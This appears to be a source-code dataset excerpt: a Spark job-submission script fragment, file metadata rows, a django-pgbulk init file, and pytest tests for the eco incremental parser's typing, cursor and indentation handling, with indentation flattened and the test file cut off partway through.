"spark.app.name": "GeoBin{}".format(epoch),
"spark.files": "{}/GeoBin.py".format(spark["instance_id"]),
"spark.service.spark_version": "2.0",
"spark.service.tenant_id": spark["tenant_id"],
"spark.service.instance_id": spark["instance_id"],
"spark.service.tenant_secret": spark["tenant_secret"],
"spark.service.user.fs.swift2d.impl": "com.ibm.stocator.fs.ObjectStoreFileSystem",
"spark.service.user.fs.swift2d.service.thunder.auth.method": "keystoneV3",
"spark.service.user.fs.swift2d.service.thunder.auth.endpoint.prefix": "endpoints",
"spark.service.user.fs.swift2d.service.thunder.auth.url": storage[
"auth_url"] + "/v3/auth/tokens",
"spark.service.user.fs.swift2d.service.thunder.region": storage["region"],
"spark.service.user.fs.swift2d.service.thunder.tenant": storage["projectId"],
"spark.service.user.fs.swift2d.service.thunder.username": storage["userId"],
"spark.service.user.fs.swift2d.service.thunder.password": storage["password"],
"spark.service.user.fs.swift2d.service.thunder.public": "true",
"spark.service.user.input.path": inp_path,
"spark.service.user.output.path": out_path,
"spark.service.user.cell.size": bin_size
}
}
with open(os.path.join(os.path.dirname(__file__), "submit-req.json"), "w") as f:
f.write(json.dumps(data))
r = requests.post(url,
headers=headers,
json=data
)
resp = r.json()
text = json.dumps(resp)
if "success" in resp and resp["success"]:
arcpy.AddMessage(text)
with open(os.path.join(os.path.dirname(__file__), "submit-res.json"), "w") as f:
f.write(text)
else:
arcpy.AddError(text)
| 37.344147 | 114 | 0.530838 | 2,600 | 26,477 | 5.258846 | 0.101154 | 0.021063 | 0.028085 | 0.017553 | 0.817377 | 0.804286 | 0.788927 | 0.77174 | 0.761208 | 0.75448 | 0 | 0.005583 | 0.350606 | 26,477 | 708 | 115 | 37.396893 | 0.789636 | 0 | 0 | 0.729642 | 0 | 0 | 0.203006 | 0.07667 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086319 | false | 0.004886 | 0.016287 | 0.039088 | 0.169381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c90795b812ede89767809ec0cb8846eefccaaecf | 132 | py | Python | pgbulk/__init__.py | jyveapp/django-pgbulk | cbd99f46e865d6037b36e50aad900acb09818278 | [
"BSD-3-Clause"
] | 12 | 2020-06-27T14:03:06.000Z | 2020-10-04T02:12:04.000Z | pgbulk/__init__.py | jyveapp/django-pgbulk | cbd99f46e865d6037b36e50aad900acb09818278 | [
"BSD-3-Clause"
] | 1 | 2021-12-24T05:11:37.000Z | 2022-01-08T02:49:52.000Z | pgbulk/__init__.py | Opus10/django-pgbulk | 0e18cf9e6c407ccff07dafaadb65082ca6cb8fe6 | [
"BSD-3-Clause"
] | 2 | 2021-06-29T19:27:22.000Z | 2021-09-28T10:52:54.000Z | from pgbulk.core import sync
from pgbulk.core import update
from pgbulk.core import upsert
__all__ = ['update', 'upsert', 'sync']
| 18.857143 | 38 | 0.75 | 19 | 132 | 5 | 0.421053 | 0.315789 | 0.442105 | 0.631579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.143939 | 132 | 6 | 39 | 22 | 0.840708 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c914af76f26c261c83682a89d270203b0a9ffb2a | 182,203 | py | Python | lib/eco/test/test_eco.py | softdevteam/eco | fdca886f13e9487f8293f50bf1fd5f02389e0fd3 | [
"MIT"
] | 54 | 2015-01-19T14:54:28.000Z | 2022-02-06T14:55:03.000Z | lib/eco/test/test_eco.py | softdevteam/eco | fdca886f13e9487f8293f50bf1fd5f02389e0fd3 | [
"MIT"
] | 228 | 2015-01-27T15:53:13.000Z | 2020-01-16T10:35:15.000Z | lib/eco/test/test_eco.py | softdevteam/eco | fdca886f13e9487f8293f50bf1fd5f02389e0fd3 | [
"MIT"
] | 12 | 2015-05-15T01:49:01.000Z | 2020-01-11T10:19:39.000Z | # Copyright (c) 2012--2014 King's College London
# Created by the Software Development Team <http://soft-dev.org/>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from grammars.grammars import lang_dict, Language
from treemanager import TreeManager
from incparser.incparser import IncParser
from inclexer.inclexer import IncrementalLexer, IncrementalLexerCF
from incparser.astree import BOS, EOS, TextNode, MultiTextNode
from grammar_parser.gparser import MagicTerminal, Terminal
from utils import KEY_UP as UP, KEY_DOWN as DOWN, KEY_LEFT as LEFT, KEY_RIGHT as RIGHT
from PyQt5 import QtCore
from . import programs
import pytest
slow = pytest.mark.slow
calc = lang_dict["Basic Calculator"]
java = lang_dict["Java"]
python = lang_dict["Python 2.7.5"]
lua = lang_dict["Lua 5.3"]
sql = lang_dict["SQL (Dummy)"]
pythonprolog = lang_dict["Python + Prolog"]
phppython = lang_dict["PHP + Python"]
pythonphp = lang_dict["Python + PHP"]
pythonhtmlsql = lang_dict["Python + HTML + SQL"]
html = lang_dict["HTML"]
class Test_Typing:
def setup_class(cls):
parser, lexer = calc.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, calc.name)
cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
def reset(self):
self.parser.reset()
self.treemanager = TreeManager()
self.treemanager.add_parser(self.parser, self.lexer, calc.name)
self.treemanager.set_font_test(7, 17)
def test_normaltyping(self):
assert self.parser.last_status == False
self.treemanager.key_normal("1")
assert self.parser.last_status == True
self.treemanager.key_normal("+")
assert self.parser.last_status == False
self.treemanager.key_normal("2")
assert self.parser.last_status == True
def test_cursormovement1(self):
self.treemanager.key_home()
assert isinstance(self.treemanager.cursor.node, BOS)
self.treemanager.cursor_movement(RIGHT)
assert self.treemanager.cursor.node.symbol.name == "1"
self.treemanager.key_end()
assert self.treemanager.cursor.node.symbol.name == "2"
def test_normaltyping2(self):
self.treemanager.key_normal("\r")
assert self.treemanager.cursor.node.symbol.name == "\r"
self.treemanager.key_normal("3")
assert self.treemanager.cursor.node.symbol.name == "3"
self.treemanager.key_normal("+")
assert self.treemanager.cursor.node.symbol.name == "+"
self.treemanager.key_normal("5")
assert self.treemanager.cursor.node.symbol.name == "5"
def test_cursormovement2(self):
assert self.treemanager.cursor.node.symbol.name == "5"
self.treemanager.key_end()
assert self.treemanager.cursor.node.symbol.name == "5"
self.treemanager.cursor_movement(UP)
assert self.treemanager.cursor.node.symbol.name == "2"
self.treemanager.cursor_movement(LEFT)
assert self.treemanager.cursor.node.symbol.name == "+"
self.treemanager.cursor_movement(DOWN)
assert self.treemanager.cursor.node.symbol.name == "+"
def test_deletion(self):
import pytest
self.treemanager.key_end()
assert self.treemanager.cursor.node.symbol.name == "5"
self.treemanager.key_backspace()
assert self.treemanager.cursor.node.symbol.name == "+"
self.treemanager.key_delete()
assert self.treemanager.cursor.node.symbol.name == "+"
self.treemanager.cursor_movement(LEFT)
self.treemanager.key_delete()
assert self.treemanager.cursor.node.symbol.name == "3"
def test_cursor_reset(self):
self.treemanager.cursor_reset()
assert isinstance(self.treemanager.cursor.node, BOS)
def test_delete_selection(self):
self.reset()
self.treemanager.key_normal("a")
self.treemanager.key_shift()
self.treemanager.key_cursors(LEFT, shift=True)
assert self.treemanager.hasSelection()
nodes, _, _ = self.treemanager.get_nodes_from_selection()
self.treemanager.key_delete()
def test_paste(self):
self.reset()
assert self.parser.last_status == False
self.treemanager.pasteText("1 + 2\r+4+5\r+6+789")
assert self.parser.last_status == True
assert self.treemanager.cursor.node.symbol.name == "789"
assert self.treemanager.cursor.pos == 3
def test_colon_colon_equals(self):
# typing colon colon equals makes the cursor disappear
grammar = Language("grammar with colon",
"""
S ::= "a" "assign" "b"
""",
"""
"a":a
"b":b
"::=":assign
":":colon
"=":equal
""")
names = ["a","b","assign", "colon", "equal"]
regex = ["a", "b", "::=", ":", "="]
lexer = IncrementalLexerCF()
lexer.from_name_and_regex(names, regex)
parser = IncParser(grammar.grammar, 1, True)
parser.init_ast()
ast = parser.previous_version
treemanager = TreeManager()
treemanager.add_parser(parser, lexer, grammar.name)
treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
treemanager.key_normal(":")
assert treemanager.cursor.node.lookup == "colon"
assert treemanager.cursor.node.symbol.name == ":"
assert treemanager.cursor.node.lookahead == 1
treemanager.key_normal(":")
assert treemanager.cursor.node.lookup == "colon"
assert treemanager.cursor.node.symbol.name == ":"
assert treemanager.cursor.node.lookahead == 1
treemanager.key_normal("=")
assert treemanager.cursor.node.lookup == "assign"
assert treemanager.cursor.node.symbol.name == "::="
def test_fix_cursor_bug(self):
grammar = Language("bug",
"""
S ::= "brack" "htm"
| "html"
""",
"""
"<":brack
"htm":htm
"<html":html
""")
names = ["html","htm","brack"]
regex = ["<html", "htm", "<",]
lexer = IncrementalLexerCF()
lexer.from_name_and_regex(names, regex)
parser = IncParser(grammar.grammar, 1, True)
parser.init_ast()
ast = parser.previous_version
treemanager = TreeManager()
treemanager.add_parser(parser, lexer, grammar.name)
treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
treemanager.key_normal("<")
assert treemanager.cursor.node.symbol.name == "<"
assert treemanager.cursor.node.lookahead == 1
treemanager.key_normal("h")
treemanager.key_normal("t")
treemanager.key_normal("m")
assert treemanager.cursor.node.symbol.name == "htm"
treemanager.key_normal("l")
assert treemanager.cursor.node.symbol.name == "<html"
treemanager.key_backspace()
assert treemanager.cursor.node.symbol.name == "htm"
from grammars.grammars import EcoFile
class Test_General:
def test_undo_bug(self):
# Sometimes grammar changes can change subtrees that haven't been marked
# as changed. As a consequence they are not marked with a version and
# won't be reverted during an undo. This tests the fix in
# incparser:reduce that version marks nodes whose parent has changed
# during reparsing.
grm = EcoFile("Undotest", "test/undobug1.eco", "Undo")
t = TreeManager()
parser, lexer = grm.load()
t.add_parser(parser, lexer, python.name)
t.key_normal("a")
t.undo_snapshot()
t.key_normal("b")
t.undo_snapshot()
t.key_normal("c")
t.undo_snapshot()
assert parser.last_status == True
c = t.cursor.node
assert c.symbol.name == "c"
cp = c.parent
t.key_cursors(LEFT)
t.key_cursors(LEFT)
t.key_normal("x")
t.undo_snapshot()
assert parser.last_status == True
assert c.parent is not cp
t.key_ctrl_z()
assert parser.last_status == True
assert c.parent is cp
def test_load_file_with_error(self):
t = TreeManager()
from jsonmanager import JsonManager
manager = JsonManager()
language_boxes = manager.load("test/calcerror.eco")
t.load_file(language_boxes)
parser = t.get_mainparser()
t.key_home()
t.key_cursors(RIGHT)
t.key_cursors(RIGHT)
t.key_delete()
assert parser.last_status is False
t.key_cursors(RIGHT)
t.key_cursors(RIGHT)
t.key_delete()
assert parser.last_status is True
def test_lexing_save_load_bug(self):
t = TreeManager()
from jsonmanager import JsonManager
manager = JsonManager()
language_boxes = manager.load("test/range_lex_bug.eco")
t.load_file(language_boxes)
parser = t.get_mainparser()
t.key_home()
t.key_cursors(RIGHT)
t.key_cursors(RIGHT)
t.key_cursors(RIGHT)
t.key_cursors(RIGHT)
t.key_cursors(RIGHT)
assert t.cursor.node.symbol.name == "range"
t.key_delete()
assert t.cursor.node.symbol.name == "rangex"
class Test_Helper:
def reset(self):
self.parser.reset()
self.treemanager = TreeManager()
self.treemanager.add_parser(self.parser, self.lexer, python.name)
self.treemanager.set_font_test(7, 17)
def view(self):
import pgviewer
pgviewer.debug(self.treemanager)
def move(self, direction, times):
for i in range(times): self.treemanager.cursor_movement(direction)
def tree_compare(self, node1, node2):
# XXX: test references (next_term, parent, lookup)
while True:
assert node1.symbol == node2.symbol
if node1.right:
assert node1.right.symbol == node2.right.symbol
if node1.next_term:
assert node1.next_term.symbol == node2.next_term.symbol
if isinstance(node1.symbol, MagicTerminal):
self.tree_compare(node1.symbol.ast, node2.symbol.ast)
if isinstance(node1, EOS) and isinstance(node2, EOS):
break
node1 = self.next_node(node1)
node2 = self.next_node(node2)
def next_node(self, node):
if node.children:
return node.children[0]
while(node.right_sibling() is None):
node = node.parent
return node.right_sibling()
class Test_Compare(Test_Helper):
def test_compare(self):
t = TreeManager()
parser, lexer = python.load()
t.add_parser(parser, lexer, python.name)
inputstring = "class Test:\r def x():\r pass\r"
t.import_file(inputstring)
self.tree_compare(parser.previous_version.parent, parser.previous_version.parent)
def test_compare2(self):
t1 = TreeManager()
parser1, lexer1 = python.load()
t1.add_parser(parser1, lexer1, python.name)
inputstring = "class Test:\r def x():\r pass\r"
t1.import_file(inputstring)
t2 = TreeManager()
parser2, lexer2 = python.load()
t2.add_parser(parser2, lexer2, python.name)
inputstring = "class Test:\r def x():\r pass\r"
t2.import_file(inputstring)
self.tree_compare(parser1.previous_version.parent, parser2.previous_version.parent)
def test_compare3(self):
t1 = TreeManager()
parser1, lexer1 = python.load()
t1.add_parser(parser1, lexer1, python.name)
inputstring = "class Test:\r def x():\r pass\r"
t1.import_file(inputstring)
t2 = TreeManager()
parser2, lexer2 = python.load()
t2.add_parser(parser2, lexer2, python.name)
inputstring = "class Test:\r def y():\r pass\r"
t2.import_file(inputstring)
with pytest.raises(AssertionError):
self.tree_compare(parser1.previous_version.parent, parser2.previous_version.parent)
class Test_Python(Test_Helper):
def setup_class(cls):
parser, lexer = python.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, python.name)
cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
class Test_Boogie(Test_Python):
def test_simple(self):
for c in "class X:\r p":
self.treemanager.key_normal(c)
class Test_Bugs(Test_Python):
def test_bug_goto(self):
inputstring = "class Test:\r def x():\r pass\r"
for c in inputstring:
self.treemanager.key_normal(c)
for i in range(4): self.treemanager.key_backspace() # remove whitespace (unindent)
inputstring = "def y():"
for c in inputstring:
self.treemanager.key_normal(c)
assert self.treemanager.cursor.node.symbol.name == ":"
for i in range(8):
self.treemanager.key_backspace() # shouldn't throw AssertionError goto != None
def test_bug_goto2(self):
self.reset()
inputstring = "class Test:\r def x():\r print()\r"
for c in inputstring:
self.treemanager.key_normal(c)
inputstring = "br"
for c in inputstring:
self.treemanager.key_normal(c)
assert self.treemanager.cursor.node.symbol.name == "br"
self.treemanager.key_backspace()
self.treemanager.key_backspace() # shouldn't throw AssertionError goto != None
def test_last_line_nonlogical(self):
self.reset()
inputstring = "class Test:\r pass"
for c in inputstring:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
self.treemanager.key_normal("\r")
assert self.parser.last_status == True
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
assert self.parser.last_status == True
def test_type_and_remove(self):
self.reset()
self.treemanager.key_normal("c")
self.treemanager.key_backspace() # shouldn't throw IndexError in repair_indentations
def test_delete_all(self):
self.reset()
source = "x = 1"
for c in source:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
for c in source:
self.treemanager.key_backspace()
assert self.parser.last_status == True
for c in source:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
def test_select_and_paste(self):
self.reset()
source = "pass"
for c in source:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
self.treemanager.key_end()
self.treemanager.key_shift()
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_cursors(LEFT, True)
self.treemanager.pasteText("back")
assert self.treemanager.export_as_text() == "back"
self.treemanager.key_home()
self.treemanager.key_shift()
self.treemanager.key_cursors(RIGHT, True)
self.treemanager.key_cursors(RIGHT, True)
self.treemanager.key_cursors(RIGHT, True)
self.treemanager.key_cursors(RIGHT, True)
self.treemanager.pasteText("again")
assert self.treemanager.export_as_text() == "again"
self.move(LEFT, 2)
self.treemanager.doubleclick_select()
self.treemanager.pasteText("test")
assert self.treemanager.export_as_text() == "test"
class Test_Indentation(Test_Python):
def test_indentation(self):
assert self.parser.last_status == True
inputstring = "class Test:\r def x():\r return x"
for c in inputstring:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
self.treemanager.key_normal("\r")
assert self.treemanager.cursor.node.symbol.name == " "
self.treemanager.key_backspace() # beware of auto indent
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
inputstring = "def y():\r pass"
for c in inputstring:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
def test_indentation_tokens(self):
def check_next_nodes(node, l):
for name in l:
node = node.next_term
assert node.symbol.name == name
assert self.treemanager.lines[0].node.next_term.symbol.name == "class"
node = self.treemanager.lines[1].node
check_next_nodes(node, ["NEWLINE", "INDENT", " ", "def"])
node = self.treemanager.lines[2].node
check_next_nodes(node, ["NEWLINE", "INDENT", " ", "return"])
node = self.treemanager.lines[3].node
check_next_nodes(node, ["NEWLINE", "DEDENT", " ", "def"])
node = self.treemanager.lines[4].node
check_next_nodes(node, ["NEWLINE", "INDENT", " ", "pass", "NEWLINE", "DEDENT", "DEDENT", "eos"])
def test_unexpected_indentation_after_bos(self):
self.reset()
inputstring = """test"""
for i in inputstring:
self.treemanager.key_normal(i)
assert self.parser.last_status == True
self.treemanager.key_home()
self.treemanager.key_normal(" ")
assert self.parser.last_status == False
self.treemanager.key_backspace()
assert self.parser.last_status == True
def test_indentation_last_line(self):
# change last line from unlogical to logical
# dedents are now being created after \r not before eos
self.reset()
inputstring = """if x:
x
"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
self.move(DOWN, 2)
self.treemanager.key_normal("z")
assert self.parser.last_status == True
def test_indentation2(self):
self.reset()
assert self.parser.last_status == True
inputstring = """class Test:
def x():
return x
def y():
execute_something()
for i in range(10):
x = x + 1
if x > 10:
print("message")
break
def z():
pass"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
assert isinstance(self.treemanager.cursor.node, BOS)
# move cursor to 'break'
self.move(DOWN, 9)
self.move(RIGHT, 16)
assert self.treemanager.cursor.node.symbol.name == " "
assert self.treemanager.cursor.node.next_term.symbol.name == "break"
# add space
self.treemanager.key_normal(" ")
assert self.parser.last_status == False
# undo
self.treemanager.key_backspace()
assert self.parser.last_status == True
# dedent 'break' 2 times
# dedent 4 spaces
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
assert self.parser.last_status == False
self.treemanager.key_backspace()
assert self.parser.last_status == True
# dedent 4 spaces
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
assert self.parser.last_status == False
self.treemanager.key_backspace()
assert self.parser.last_status == True
def test_indentation3(self):
self.reset()
assert self.parser.last_status == True
inputstring = """class Test:
def x():
return x
def y():
for i in range(10):
x = x + 1
if x > 10:
print("message")
def z():
pass"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
assert isinstance(self.treemanager.cursor.node, BOS)
# move cursor to 'break'
self.move(DOWN, 4)
self.move(RIGHT, 8)
# indent 'for' and 'x = x + 1'
assert self.treemanager.cursor.node.next_term.symbol.name == "for"
for i in range(4): self.treemanager.key_normal(" ")
assert self.parser.last_status == False
self.move(DOWN, 1)
assert self.treemanager.cursor.node.next_term.symbol.name == "x"
for i in range(4): self.treemanager.key_normal(" ")
assert self.parser.last_status == True
def test_indentation4(self):
self.reset()
assert self.parser.last_status == True
inputstring = """class Test:
def x():
x = 1
return x
def y():
y = 2
return y
def z():
z = 3
return z"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
assert isinstance(self.treemanager.cursor.node, BOS)
# move cursor to 'break'
self.move(DOWN, 4)
self.move(RIGHT, 4)
# indent 'def y', 'y = 2' and 'return y'
assert self.treemanager.cursor.node.next_term.symbol.name == "def"
for i in range(4): self.treemanager.key_normal(" ")
assert self.parser.last_status == False
self.move(DOWN, 1)
assert self.treemanager.cursor.node.next_term.symbol.name == "y"
for i in range(4): self.treemanager.key_normal(" ")
assert self.parser.last_status == True
self.move(DOWN, 1)
self.move(LEFT, 4)
assert self.treemanager.cursor.node.next_term.symbol.name == "return"
for i in range(4): self.treemanager.key_normal(" ")
assert self.parser.last_status == True
@slow
def test_indentation_stresstest(self):
import random
self.reset()
self.treemanager.import_file(programs.connect4)
assert self.parser.last_status == True
deleted = {}
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
for linenr in random_lines:
whitespace = self.treemanager.get_indentation(linenr)
if whitespace:
del_ws = random.randint(0, whitespace)
if del_ws > 0:
self.treemanager.cursor_reset()
print("self.treemanager.cursor_reset()")
print("self.move(DOWN, %s)" % linenr)
print("self.move(RIGHT, %s)" % del_ws)
self.move(DOWN, linenr)
self.move(RIGHT, del_ws)
assert self.treemanager.cursor.node.symbol.name == " " * whitespace
for i in range(del_ws):
print("self.treemanager.key_backspace()")
self.treemanager.key_backspace()
deleted[linenr] = del_ws
assert self.parser.last_status == False
# undo
for linenr in deleted:
del_ws = deleted[linenr]
print("self.treemanager.cursor_reset()")
self.treemanager.cursor_reset()
print("self.move(DOWN, %s)" % linenr)
self.move(DOWN, linenr)
for i in range(del_ws):
self.treemanager.key_normal(" ")
assert self.parser.last_status == True
def test_indentation_stresstest_bug(self):
self.reset()
self.treemanager.import_file(programs.connect4)
self.treemanager.cursor_reset()
self.move(DOWN, 7)
self.move(RIGHT, 7)
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 8)
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
# undo
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.treemanager.key_normal(" ")
self.treemanager.key_normal(" ")
self.treemanager.key_normal(" ")
self.treemanager.key_normal(" ")
self.treemanager.key_normal(" ")
self.treemanager.key_normal(" ")
self.treemanager.key_normal(" ")
self.treemanager.key_normal(" ")
self.treemanager.cursor_reset()
self.move(DOWN, 7)
# shouldn't cause AttributeError: 'NoneType' object has no attribute 'relex'
self.treemanager.key_normal(" ")
def test_indentation_stresstest_bug_short(self):
self.reset()
self.treemanager.import_file("""class Connect4():
def __init__():
pass1
pass2
pass3
def _set_status_text():
pass4""")
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
def test_indentation_stresstest_bug2_indentation(self):
self.reset()
s = """class Connect4(object):
UI_DEPTH = 5
def __init__(self):
x
y
z"""
self.treemanager.import_file(s)
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 7)
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.treemanager.key_normal(' ')
self.treemanager.key_normal(' ')
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.treemanager.key_normal(' ')
self.treemanager.key_normal(' ')
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.treemanager.key_normal(' ')
def test_indentation_stresstest_bug3(self):
self.reset()
connect4 = """class Connect4():
def _update_from_pos_one_colour():
assert colour in x
for c in pylist:
a"""
self.treemanager.import_file(connect4)
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 15)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 10)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 13)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 4)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 12)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 5)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 17)
self.treemanager.key_delete()
def test_indentation_stresstest_bug_retain(self):
# In the `pass1` method `textlength` needs to check the yield of the
# previous version of the program. Wagner's thesis uses the current
# version, which is limited by the error and thus can never have a
# greater yield than the location of error
self.reset()
prog = """class Connect4(object):
def __init__():
top
# comment
turn
for colno in cols:
grid
append1
append2
grid2
grid3
def _turn():
if ai:
break
pass"""
self.treemanager.import_file(prog)
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 4)
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 1)
self.treemanager.key_backspace()
self.treemanager.cursor_reset()
self.move(DOWN, 17)
self.move(RIGHT, 11)
self.treemanager.key_backspace()
# This is the part where the bug is introduced, leading to an
# error later on
self.treemanager.cursor_reset()
self.move(DOWN, 14)
self.move(RIGHT, 2)
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.cursor_reset()
self.move(DOWN, 18)
self.move(RIGHT, 7)
self.treemanager.key_backspace()
def test_indentation_stresstest_bug_retain2(self):
# When retaining a subtree we need to enforce `mark_changed` on it to
# make sure the retained changes are being saved once parsing is
# complete
self.reset()
prog = """class Connect4():
def __init__():
pass1
pass2
pass3
pass4"""
self.treemanager.import_file(prog)
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 2)
self.treemanager.key_normal('(')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 2)
self.treemanager.key_normal('!')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 4)
self.treemanager.key_normal('4')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 3)
self.treemanager.key_normal('%')
def test_single_statement(self):
self.reset()
assert self.parser.last_status == True
inputstring = """x = 12"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
def test_line_becomes_first_line(self):
self.reset()
assert self.parser.last_status == True
inputstring = """class X:\r pass"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
for i in range(13):
self.treemanager.key_delete()
assert self.parser.last_status == True
def test_not_logical_lines(self):
self.reset()
inputstring = """class X(object):\r def test():\r return asd\r \r def relex(self, startnode):\r pass"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
def test_paste(self):
self.reset()
inputstring = """class X(object):\r pass1\rx"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
self.treemanager.key_end()
assert self.treemanager.cursor.node.symbol.name == ":"
self.treemanager.key_normal("\r")
assert self.treemanager.cursor.node.symbol.name == "\r"
self.treemanager.pasteText(""" if a:
pass2
pass3
if b:
if c:
pass4""")
assert self.treemanager.cursor.node.symbol.name == "pass4"
assert self.parser.last_status == True
def test_bug(self):
self.reset()
inputstring = """class X(object):\rpass"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == False
self.treemanager.cursor_movement(DOWN)
self.treemanager.key_home()
self.treemanager.key_normal(" ")
assert self.parser.last_status == True
def test_bug2(self):
self.reset()
inputstring = """a = 3
while True:
a = 4"""
for c in inputstring:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
self.treemanager.key_normal("\r")
self.treemanager.key_normal("x")
assert self.parser.last_status == True
def test_opt_push_last_before_eos_1(self):
self.reset()
inputstring = """class X:\r def x():\r pass\r def y():\r pass"""
self.treemanager.import_file(inputstring)
self.move(DOWN, 3)
assert self.parser.last_status == True
# delete whitespace before def y():
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
assert self.parser.last_status == False
self.treemanager.key_delete()
assert self.parser.last_status == True
# put whitespace back in
self.treemanager.key_normal(" ")
self.treemanager.key_normal(" ")
self.treemanager.key_normal(" ")
assert self.parser.last_status == False
